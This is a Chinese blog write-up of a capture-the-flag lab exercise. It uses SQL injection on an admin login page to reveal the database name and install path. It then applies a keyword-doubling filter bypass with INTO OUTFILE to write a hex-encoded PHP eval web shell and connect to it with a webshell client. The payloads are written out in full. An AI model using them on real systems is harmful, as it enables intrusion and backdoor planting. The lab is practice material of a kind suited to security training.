封神台-尤里的复仇II 回归sql-注入绕过防护getshell

文章讲述了通过一个靶场链接发现后台登录页面,并通过SQL注入技术探测到数据库路径。利用盲注技巧,作者写入了一个PHP一句话木马,并成功创建了文件ttt1.php。最后,计划使用菜刀蚁剑工具进行远程连接。
摘要由CSDN通过智能技术生成

http://cntj8003.ia.aqlab.cn/bees/admin/login.phpz

直接在给出的靶场链接后面加上admin回车,跳转到后台登录页面,没有做目录扫描

1、在用户名处加上'测试,发现报错,存在注入漏洞

2、尝试报错注入

将用户名改为:admin' or extractvalue(1,concat(0x7e,database())) #

爆数据库安装路径admin' or extractvalue(1,concat(0x7e,@@basedir)) #

phpstudy,哈哈,盲猜网站的web路径为D:/phpStudy/ WWW

找个写入SQL写入一句话木马的payload

admin'+un+union+ion+seselectlect+1,2,3,4,0x3C3F70687020406576616C28245F504F53545B27313233275D293B3F3E++in+into+ououtfiletfile+'D:/phpStudy/www/ttt1.php'--+

其中0x为16进制编码的开头,3C3F70687020406576616C28245F504F53545B27313233275D293B3F3E为<?php @eval($_POST['123']);?>的16进制编码,其他内容请参考其他博主的博客~~

 访问http://cntj8003.ia.aqlab.cn/ttt1.php

上菜刀蚁剑进行连接

 

 

end。 

其实后台密码,我上来就admin+admin登录了,靶场的弱口令习惯了哈哈,但是没有进后台去上传的方式来getshell,哈哈。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值